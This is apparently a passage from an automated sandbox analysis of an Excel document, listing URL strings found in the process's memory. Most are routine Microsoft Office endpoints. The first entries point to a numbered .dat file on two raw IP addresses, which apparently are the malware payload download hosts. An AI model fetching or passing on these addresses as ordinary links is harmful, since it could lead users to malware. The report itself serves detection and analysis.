    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/337591964609.dat2
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/337591964609.dath
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/337591964609.dat
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/337591964609.dat2
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/337591964609.dat2?
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/337591964609.datG
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: EXCEL.EXE, 00000000.00000002.605945415.000000000D551000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram)
    Source: EXCEL.EXE, 00000000.00000002.605945415.000000000D551000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
    Source: EXCEL.EXE, 00000000.00000003.512416539.0000000012F16000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micr/
    Source: EXCEL.EXE, 00000000.00000003.455330974.00000000156F1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.454666874.0000000015786000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.454809646.00000000155F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000000.00000003.455330974.00000000156F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
    Source: EXCEL.EXE, 00000000.00000003.454666874.0000000015786000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.454809646.00000000155F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: EXCEL.EXE, 00000000.00000003.456916079.0000000012F1B000.00000004.00000001.sdmpString found in binary or memory: http://ww.org
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticatedf
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatede
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeW
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryK
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.aadrm.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.aadrm.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.aadrm.com7
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.cortana.ai
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comom
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.office.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net?J
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netGK$;a
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netvI5=
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.onedrive.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comcentG
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsN
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://augloop.office.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2e
    Source: EXCEL.EXE, 00000000.00000002.605945415.000000000D551000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml)
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cdn.entity.
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab4
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/5
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/f
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies%
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosE.r8%
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey2
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyl
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx0
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Officei
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com1
